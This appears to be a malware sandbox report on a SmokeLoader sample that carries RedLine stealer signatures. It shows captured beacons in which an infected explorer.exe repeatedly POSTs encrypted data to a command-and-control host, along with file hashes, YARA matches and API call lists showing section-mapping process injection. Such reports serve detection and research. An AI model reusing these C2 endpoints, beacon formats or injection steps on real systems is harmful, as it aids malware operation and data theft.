Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:04:56.730218887 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qcthmhytlnkrqkwa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: nwgrus.ru
Oct 14, 2024 06:04:56.730258942 CEST	358	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 53 b4 e6 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vuDSifky?p'ye=a<=l%RL]25~wMQs'H{6@Y!;K y#DXtS-E9f
Oct 14, 2024 06:04:58.244179964 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:04:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	50026	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:02.506752014 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://irmipcatkrgbgkn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 295 Host: nwgrus.ru
Oct 14, 2024 06:05:02.506829977 CEST	295	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 49 ff fc Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA .[k,vuyI(FWvn_S!m-9$<)eHOAi%ZGd2}ta(i9n)g^'!?LleX@NJY0'
Oct 14, 2024 06:05:04.062722921 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:05:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	50027	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:08.613362074 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cxjsppdhykfhkdy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 178 Host: nwgrus.ru
Oct 14, 2024 06:05:08.613362074 CEST	178	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 3e f3 a8 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vuN>X9v\ch2UUB1XbJ;d'l4$G0==R]^S2;d[D
Oct 14, 2024 06:05:10.088608027 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:05:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	50028	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:16.547518969 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wmcfxulhyyb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: nwgrus.ru
Oct 14, 2024 06:05:16.547554970 CEST	151	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 5f b6 a0 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vuE_Mkz}jzH^q=oT51l'!9V!Z\:!
Oct 14, 2024 06:05:18.034732103 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:05:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	50030	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:22.429583073 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nhfvlqknfjyv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: nwgrus.ru
Oct 14, 2024 06:05:22.429619074 CEST	188	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 04 b8 8e Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu1MNsBW'+VLG5^2jfF]VZ8}~LF2^Edv/<RxF
Oct 14, 2024 06:05:24.004805088 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:05:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	50031	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:30.250528097 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kdpqwaweroenq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: nwgrus.ru
Oct 14, 2024 06:05:30.250555038 CEST	200	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 5b df 89 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu)[W3eE`e!\2y{^<fKvq6^aB=ij'&:dkU?X\[u+J
Oct 14, 2024 06:05:31.785276890 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:05:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	50032	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:36.023633003 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qymlmmmarfrlf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: nwgrus.ru
Oct 14, 2024 06:05:36.023652077 CEST	203	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 64 4c de e1 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vudLNn\|'ZNUf<oBMwNsP@}TPZ&F?q w) \|nRA
Oct 14, 2024 06:05:37.619925022 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:05:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	50033	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:42.127414942 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sjchoqywbhy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: nwgrus.ru
Oct 14, 2024 06:05:42.127444983 CEST	126	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 2d bc fa Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA .[k,vu>-]KawFsvh10nG~j
Oct 14, 2024 06:05:43.752674103 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:05:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	50034	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:47.919637918 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lfpsmslcgfbr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: nwgrus.ru
Oct 14, 2024 06:05:47.919661045 CEST	223	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 0f fa fc Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vurJMgZN7Ua?!sfE[_V9B%Y '>AI@$W6vJVjRn\|TL8p}e
Oct 14, 2024 06:05:49.450983047 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:05:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	50035	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:53.119637966 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vpqrqumkciggjbf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 332 Host: nwgrus.ru
Oct 14, 2024 06:05:53.119656086 CEST	332	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 58 e8 b8 Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA .[k,vufXQ}PSEQ'="WN`sHR5`u>];1N`];AS@')>`(~EX}UX^$Mo}c_;
Oct 14, 2024 06:05:55.638432980 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:05:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	50036	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:05:59.062105894 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yprnusgmnhodqa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 134 Host: nwgrus.ru
Oct 14, 2024 06:05:59.062125921 CEST	134	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2e 19 df ad Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu.YiD}V4C\|5<8?R~td
Oct 14, 2024 06:06:00.592765093 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:06:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	50037	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:06:04.583408117 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hwgseaeonxo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 199 Host: nwgrus.ru
Oct 14, 2024 06:06:04.583408117 CEST	199	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 25 41 eb 9c Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu%AHz\N.PW@;{}#.}r8 NGhB)WHxH.Vh}\|^<E:
Oct 14, 2024 06:06:06.826704979 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:06:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 14, 2024 06:06:06.826754093 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:06:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 14, 2024 06:06:06.826762915 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:06:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	50038	211.171.233.129	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:06:11.776343107 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lxdpanclboemkjpp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 178 Host: nwgrus.ru
Oct 14, 2024 06:06:11.776376009 CEST	178	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 24 c4 88 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu2$+@bZ_n6qg8ec("l6EF,v2P om:/MBgKE(
Oct 14, 2024 06:06:13.269507885 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:06:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Target ID:	0
Start time:	00:02:07
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	274'944 bytes
MD5 hash:	29EAF4B051758C9946539B6BA8AA475F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:02:17
Start date:	14/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	00:02:35
Start date:	14/10/2024
Path:	C:\Users\user\AppData\Roaming\fbtdajh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\fbtdajh
Imagebase:	0x400000
File size:	274'944 bytes
MD5 hash:	29EAF4B051758C9946539B6BA8AA475F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	28.2%
Signature Coverage:	41.8%
Total number of Nodes:	170
Total number of Limit Nodes:	6

Executed Functions

Function 004173E0 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 269
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004174B0
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 004174C9
FindAtomW.KERNEL32(00000000), ref: 004174D0
GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 004174D8
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004174F0
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00417517
MoveFileW.KERNEL32(00000000,00000000), ref: 0041751F
GetVersionExW.KERNEL32(?), ref: 0041752C
DisconnectNamedPipe.KERNEL32(?), ref: 0041753F
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00417584
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00417593
LCMapStringA.KERNEL32(00000000,00000000,004193C8,00000000,?,00000000), ref: 004175A9
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 004175BB
PulseEvent.KERNEL32(00000000), ref: 004175CB
SetCommState.KERNELBASE(00000000,00000000), ref: 004175F4
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00417621
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00417632
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041763A
LoadLibraryA.KERNELBASE(004193F8), ref: 004176D2

Strings

}$, xrefs: 00417727
k`, xrefs: 00417703

Memory Dump Source

Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: Console$Comm$FileReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectEventExchangeFindFontInterlockedLengthLibraryLoadModuleMoveNameNamedOutputPathPipePulseRectSearchSizeStateTypeVersion
String ID: k`$}$
API String ID: 2183200751-956986773
Opcode ID: ddd81308ca95ea6083750847ef12a8dd7c988e9d9fcdb0e85733d7453e5142f1
Instruction ID: 4b0af0e3fa1ca4ab076df1e70508018619d961bc3f3b7d37d78c72f8efd93fb6
Opcode Fuzzy Hash: ddd81308ca95ea6083750847ef12a8dd7c988e9d9fcdb0e85733d7453e5142f1
Instruction Fuzzy Hash: CE911371845524ABC720AB65EC44ADF7F79EF4E351F01406EF50AA3190CB381A85CFAD

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
